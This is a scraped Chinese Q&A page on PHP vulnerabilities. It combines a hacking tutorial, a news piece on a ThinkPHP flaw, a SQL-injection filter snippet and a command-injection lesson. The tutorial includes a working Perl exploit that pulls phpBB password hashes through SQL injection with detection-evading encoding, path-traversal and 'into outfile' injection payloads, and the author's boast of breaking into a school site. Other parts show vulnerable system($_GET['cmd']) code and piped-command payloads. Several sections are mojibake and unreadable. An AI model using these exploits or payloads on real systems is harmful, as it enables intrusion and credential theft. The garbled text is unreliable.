當前位置:首頁 » 編程語言 » php函數漏洞

php函數漏洞

發布時間: 2024-05-02 17:15:26

1. php頁面漏洞分析及相關問題解決


從現在的網路安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權。然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多。在這里,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧。
我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,sql注入漏洞等幾種。當然,至於COOKIE欺騙等一部分通用的技術就不在這里討論了,這些資料網上也很多。那麼,我們就一個一個來分析一下怎樣利用這些漏洞吧!
首先,我們來討論包含文件漏洞。這個漏洞應該說是PHP獨有的吧。這是由於不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以WEB進程許可權在系統上執行任意命令。我們來看一個例子:假設在a.php中有這樣一句代碼:
以下是引用片段:
include($include."/xxx.php");
?
在這段代碼中,$include一般是一個已經設置好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的。比方說我們提交:a.php?include=
接著,我們再來看一下腳本命令執行漏洞。這是由於對用戶提交的URI參數缺少充分過濾,提交包含惡意HTML代碼的數據,可導致觸發跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的
再然後,我們就來看看文件泄露漏洞了,這種漏洞是由於對用戶提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發現的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字元的數據,便可繞過WEB ROOT限制,以WEB許可權查看系統上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了。在這方面相對多一點,有:myPHPNuke,McNews等等。
最後,我們又要回到最興奮的地方了。想想我們平時在asp頁面中用SQL注入有多麼爽,以前還要手動注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然後再開做出NBSI以後,我們NB聯盟真是拉出一片天空。曾先後幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞。(這些廢話不多說了,有點跑題了...)。
還是言規正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數就好了。將asc改成ASCII,len改成LENGTH,其他函數基本不變了。其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這並不是說它的論壇安全太差,而是名氣太響,別人用的肢山多了歷團中,研究的人也就多了,發現的安全漏洞也就越多了。PHPBB也是一樣的,現在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB。它的漏洞也是一直在出,從最早 phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的groupcp.php,,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧。這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以後的PHPBB會越來越好。
好了,我們還是來分析一下漏洞產生的原因吧。拿viewtopic.php頁面來說,由於在調用viewtopic.php時,直接從GET請求中獲得"topic_id"並傳遞給SQL查詢命令,而並沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字元串用於獲得MD5密碼,獲得此密碼信息可以用於自動登錄或者進行暴力破或氏解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因)。先看一下相關源代碼:
以下是引用片段:
#
if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))
#
{
#
$topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);
#
}
#
elseif(isset($HTTP_GET_VARS['topic']))
#
{
#
$topic_id=intval($HTTP_GET_VARS['topic']);
#
}
從上面我們可以看出,如果提交的view=newest並且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4)。
以下是引用片段:
#
$sql = "SELECT p.post_id
#
FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s," . USERS_TABLE . " u
#
WHERE s.session_id = '$session_id'
#
AND u.user_id = s.session_user_id
#
AND p.topic_id = $topic_id
#
AND p.post_time = u.user_lastvisit
#
ORDER BY p.post_time ASC
#
LIMIT 1";
Rick提供了下面的這斷測試代碼:
use IO::Socket;
$remote = shift || 'localhost'
$view_topic = shift ||'/phpBB2/viewtopic.php'
$uid = shift || 2;
$port = 80;
$dBType = 'mysql4'
# mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";
$p = "";
for($index=1; $index=32; $index++)
{
$socket = IO::Socket::INET-new(PeerAddr = $remote,
PeerPort = $port,
Proto = "tcp",
Type = SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@ ";
$str = "GET $view_topic" . "?sid=1topic_id=-1" .random_encode(make_dbsql()) ."view=newest" . " HTTP/1.0 ";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1 ";
# replace this for pgsql or remove it
print $socket "Host: $remote ";
while ($answer = $socket)
{
if ($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=#
{
$p .= chr ();
}
}
close($socket);
}
print " MD5 Hash for uid $uid is $p ";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;
if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
#p#副標題#e#
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dBType eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dBType eq 'pgsql')
{
return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
這段代碼,我就不多做解釋了.作用是獲得HASH值.
看到這里,大家可能有點疑問,為什麼我前面講的那些改的函數怎麼沒有用到,我講出來不怕大家笑話:其實網上很多站點有些頁面的查詢語句看起來會是這樣:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,這是真的,我還靠這個進過幾個大型網站.至於哪一些,不好講出來,不過我們學校的網站,我就是靠這個進後台的,把前面那函數用上吧.不然你只有改人家的密碼了哦!!!
差點忘了一點,在SQL注入的時候,PHP與ASP有所不同,mysql對sql語句的運用沒有mssql靈活,因此,很多在mssql上可以用的查詢語句在mysql中都不能奏效了. 一般我們常見的注入語句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
這樣可以將資料庫數據導出為文件,然後可以查看.
或是這樣:mode=',user_level=Ɗ
這個語句一般用在修改資料時,假設頁面存在漏洞的話,就可以達到提升許可權的做用.
其它的如' OR 1=1 -- 或者:1' or 1=Ƈ則跟asp差不多.這里不多講了.在php裡面,SQL注入看來還是漏洞之首啊,有太多的頁面存在這個問題了.
其實大家可以看出來,上面那些分類歸根結底只有一個原因:提交參數沒過濾或是過濾不夠嚴謹.
#p#副標題#e#

2. ThinkPHP開發框架曝安全漏洞,超過4.5萬家中文網站受影響

據外媒ZDNet報道,近期有超過4.5萬家中文網站被發現容易遭到來自黑客的攻擊,而導致這一安全風險出現的根源僅僅是因為一個ThinkPHP漏洞。

報道稱,有多家網路安全公司在近期都發現了針對運行著基於ThinkPHP的Web應用程序的伺服器的掃描活動。ThinkPHP是一個快速、兼容而且簡單的輕量級國產PHP開發框架,支持Windows/Unix/Linux等伺服器環境,以及MySql、PgSQL、Sqlite多種資料庫和PDO插件,在國內 Web 開發領域非常受歡迎。

另外,所有這些掃描活動都是在網路安全公司VulnSpy將一個ThinkPHP漏洞的概念驗證代碼(PoC)發布到ExploitDB網站上之後開始進行的。這里需要說明的是,ExploitDB是一家提供免費託管漏洞利用代碼的熱門網站。

VulnSpy公司發布的概念驗證代碼利用了一個存在於ThinkPHP開發框架invokeFunction 函數中的漏洞,以在底層伺服器上執行任意代碼。值得注意的是,這個漏洞可以被遠程利用,且允許攻擊者獲得對伺服器的完全控制許可權。

「PoC是在12月11日發布的,我們在不到24小時之後就看到了相關的互聯網掃描。」 網路安全公司Bad Packets LLC的聯合創始人Troy Mursch告訴ZDNet。

隨後,其他四家安全公司——F5 Labs、GreyNoise、NewSky Security和Trend Micro也報道了類似的掃描。並且,這些掃描在接孝侍下來的幾天里一直呈上升趨勢。

與此同時,開始利用這個ThinkPHP 漏洞來開展攻擊活動的黑客組織也在不斷增加。到目前為止,被確認的黑客組織至少包括:最初利用該漏洞的攻擊者、一個被安全專家命名為「D3c3mb3r」的黑客組織、以及另一個利用該漏洞傳播Miori IoT惡意軟體的黑客組織。

由Trend Micro檢測到的最後一組數據還表明,旨在傳播Miori IoT惡意軟體的黑客組織似乎想要利用該漏洞來入侵家用路由器和物聯網設備的控制面板,因為Miori無法在實際的Linux伺服器上正常運行。

此外,從NewSky Security檢測到另一組掃描來看,攻擊者試圖在運行著基於ThinkPHP的Web應用程序的伺服器上運行Microsoft Powershell命令。NewSky Security的首席安全研究員Ankit Anubhav告訴ZDNet,「這些Powershell命令看上去有些多餘。實際上,攻擊者擁有的一些代碼完全可以用來檢查操作系統的類型,並為不同的Linux伺服器運行不同的漏洞利用代碼,運行Powershell命令可能只是為了碰碰運氣。」

事實上,最大規模掃描的發起者應該是上述被被安全專家命名為「D3c3mb3r」的黑客組織。但這個組織並沒有做任何特別的事情。他們沒有使用加密貨幣礦工或其他任何惡意軟體來感染伺服器。他們只是掃描易受攻擊的伺服器,然後運行一個基本的「echo hello d3c3mb3r」命令。

Ankit Anubhav告訴ZDNet:「我不確定他們的動機。」

根據Shodan搜索引擎的統計,目前有超過45800台運行著基於ThinkPHP的Web應用程序的伺服器可在線訪問。其中,有超過40000台託管在中國IP地址上。這主要是由於ThinkPHP的文檔僅提供了中文版本,因此不太可能在國外被使用。這也是解釋了為什麼被認為易遭到攻擊的網站大部分都是中文網站。

安全專家認為,隨著越來越多的黑客組織了解到這種入侵 Web 伺服器的方法,對中文網站的攻擊也必然會有所增加。

此外,F5 Labs已經公布了有關這個ThinkPHP 漏洞的技術分析和POC的工作原理,大家可以通過點擊這毀鄭里進行查看。

本文由 黑客視界 綜合網路整理,圖片源自網路巧余吵;轉載請註明「轉自黑客視界」,並附上鏈接。

3. php涓浜嗚В鏈夊摢浜涘規槗瀵艱嚧婕忔礊鐨勫嵄闄╁嚱鏁幫紵

鎴戠煡閬撶殑涓浜涢槻姝㈡紡媧炵殑鏈夛細瀵硅〃鍗曟暟鎹鍋氳繃婊わ紝楠岃瘉銆傛渶濂戒笉瑕佺敤eval鍑芥暟錛岄槻姝php鑴氭湰娉ㄥ叆銆俻hp.ini閰嶇疆閲岄潰鏈変釜瀹夊叏鐨勯厤緗緇欐墦寮銆

4. php防sql注入漏洞可以用什麼函數

1.函數的構建
function inject_check($sql_str) {
return eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $sql_str); // 進行過濾
}
function verify_id($id=null) {
if (!$id) { exit('沒有提交參數!'); } // 是否為空判斷
elseif (inject_check($id)) { exit('提交的參數非法!'); } // 注射判斷
elseif (!is_numeric($id)) { exit('提交的參數非法!'); } // 數字判斷
$id = intval($id); // 整型化
return $id;
}?
function str_check( $str ) {
if (!get_magic_quotes_gpc()) { // 判斷magic_quotes_gpc是否打開
$str = addslashes($str); // 進行過濾
}
$str = str_replace("_", "\_", $str); // 把 '_'過濾掉
$str = str_replace("%", "\%", $str); // 把 '%'過濾掉
return $str;
}
function post_check($post) {
if (!get_magic_quotes_gpc()) { // 判斷magic_quotes_gpc是否為打開
$post = addslashes($post); // 進行magic_quotes_gpc沒有打開的情況對提交數據的過濾
}
$post = str_replace("_", "\_", $post); // 把 '_'過濾掉
$post = str_replace("%", "\%", $post); // 把 '%'過濾掉
$post = nl2br($post); // 回車轉換
$post = htmlspecialchars($post); // html標記轉換
return $post;
}
2.函數的使用實例
<?php
if (inject_check($_GET['id']))
{
exit('你提交的數據非法,請檢查後重新提交!');
}
else
{
$id = $_GET['id'];
//處理數據………………
}
?>

5. 鍛戒護鎵ц屾紡媧

鍛戒護鎵ц屾紡媧炵殑鎴愬洜錛

鑴氭湰璇璦(濡侾HP )浼樼偣鏄綆媧併佹柟渚,浣嗕篃浼撮殢鐫涓浜涢棶棰,濡傞熷害鎱銆佹棤娉曟帴瑙︾郴緇熷簳灞,濡傛灉鎴戜滑寮鍙戠殑搴旂敤(鐗瑰埆鏄浼佷笟綰х殑涓浜涘簲鐢)闇瑕-浜涢櫎鍘粀eb鐨勭壒孌婂姛鑳芥椂,灝遍渶瑕佽皟鐢ㄤ竴浜涘栭儴紼嬪簭銆傚綋搴旂敤闇瑕佽皟鐢ㄤ竴浜涘栭儴紼嬪簭鍘誨勭悊鍐呭圭殑鎯呭喌涓, 灝變細鐢ㄥ埌浜涙墽琛岀郴緇熷懡浠ょ殑鍑芥暟銆傚侾HP涓鐨剆ystem銆乪xec. shell exec絳,褰撶敤鎴峰彲浠ユ帶鍒跺懡浠ゆ墽琛屽嚱鏁頒腑鐨勫弬鏁版椂,灝嗗彲浠ユ敞鍏ユ伓鎰忕郴緇熷懡浠ゅ埌姝e父鍛戒護涓,閫犳垚鍛戒護鎵ц屾敾鍑匯

PHP涓璋冪敤澶栭儴紼嬪簭鐨勪富瑕佹湁浠ヤ笅鍑芥暟錛

system

exec

shell_exec

passthru

popen

proc_popen

鍏ㄥ矓鎼滅儲榪欎簺鍑芥暟錛岃傚療鏄鍚﹀彲浠ユ帶鍒躲

鍛戒護鎵ц屾紡媧炵殑闃插盡錛

鍙鎺х偣涓哄緟鎵ц岀殑紼嬪簭

<?php

$arg = $_GET[鈥榗md鈥橾;

if($arg){

system(鈥$arg鈥);

}

?>

[if !supportLists]l [endif]/?cmd=id

[if !supportLists]l [endif]/?cmd=pwd

[if !supportLists]l [endif]/?cmd=ifconfig

鍙鎺х偣鏄浼犲叆紼嬪簭鐨勬暣涓鍙傛暟錛堟棤寮曞彿鍖呰9錛

<?php

$arg = $_GET[鈥榗md鈥橾;

if($arg){

system(鈥減ing -c 3 $arg鈥);

}

?>

鎴戜滑鑳藉熸帶鍒剁殑鐐規槸紼嬪簭鐨勬暣涓鍙傛暟錛屾垜浠鍙浠ョ洿鎺ョ敤&&鎴東絳夌瓑錛屽埄鐢ㄤ笌銆佹垨銆佺¢亾鍛戒護鏉ユ墽琛屽叾浠栧懡浠ゃ

/?cmd=127.0.0.1| ifconfig

鍙鎺х偣鏄鏌愪釜鍙傛暟鐨勫礆紙鏈夊弻寮曞彿鍖呰9錛

<?php

$arg = $_GET[鈥榗md鈥橾;

if($arg){

system(鈥渓s -al \鈥$arg\鈥濃);

}

?>

闂鍚堝弻寮曞彿銆

/?cmd=/home鈥 | ifconfig;鈥

鍙鎺х偣鏄鏌愪釜鍙傛暟鐨勫礆紙鏈夊崟寮曞彿鍖呰9錛

<?php

$arg = $_GET[鈥榗md鈥橾;

if($arg){

system(鈥渓s -al  鈥$arg鈥 鈥);

}

?>

鍦ㄥ崟寮曞彿鍐呯殑璇濓紝鍙鏄涓涓瀛楃︿覆錛屽洜姝ゆ兂瑕佹墽琛屽懡浠ゅ繀欏婚棴鍚堝崟寮曞彿銆

/cmd?=/home鈥 |ifconfig鈥

鍛戒護鎵ц屾紡媧炵殑闃插盡錛

1銆佽兘浣跨敤鑴氭湰瑙e喅鐨勫伐浣,涓嶈佽皟鐢ㄥ叾浠栫▼搴忓勭悊銆傚敖閲忓皯鐢ㄦ墽琛屽懡浠ょ殑鍑芥暟,騫跺湪disable functions涓紱佺敤涔嬨

2銆佸逛簬鍙鎺х偣鏄紼嬪簭鍙傛暟鐨勬儏鍐碉紝浣跨敤escapeshellcmd鍑芥暟榪涜岃繃婊ゃ

3銆佸逛簬鍙鎺х偣鏄紼嬪簭鍙傛暟鐨勫肩殑鎯呭喌錛屼嬌鐢╡scapeshellarg鍑芥暟榪涜岃繃婊ゃ

4銆佸弬鏁扮殑鍊煎敖閲忎嬌鐢ㄥ紩鍙峰寘瑁,騫跺湪鎷兼帴鍓嶈皟鐢╝ddslashes榪涜岃漿涔夈

6. PHP漏洞有哪些

首先和ASP一樣,對敏感字元過濾不嚴會導致注入..
還有PHP很有特點,他得運行程序是很人性化得,如果設置不好,隨便提交個有錯得地址之類就會告訴你絕對路徑之類得敏感信息.
PHP包含過濾不嚴會導致讀取任意文件.
變數過濾不嚴會導致偽造數據欺騙伺服器.
等等等等好多..我說得這些都是比較常見和常用得

熱點內容
linux命令全稱 發布:2024-05-17 12:07:54 瀏覽:109
ftpnas區別 發布:2024-05-17 12:06:18 瀏覽:947
512g存儲晶元價格 發布:2024-05-17 12:04:48 瀏覽:962
腳本運行周期 發布:2024-05-17 11:39:09 瀏覽:807
阿里雲伺服器怎麼配置發信功能 發布:2024-05-17 11:37:24 瀏覽:312
編程中的變數 發布:2024-05-17 11:33:06 瀏覽:776
加密視頻怎麼解密 發布:2024-05-17 11:02:52 瀏覽:571
柳工挖機密碼多少合適 發布:2024-05-17 11:00:40 瀏覽:188
android工程嘆號 發布:2024-05-17 10:56:21 瀏覽:481
在蘋果手機應用怎麼比安卓貴 發布:2024-05-17 10:56:20 瀏覽:548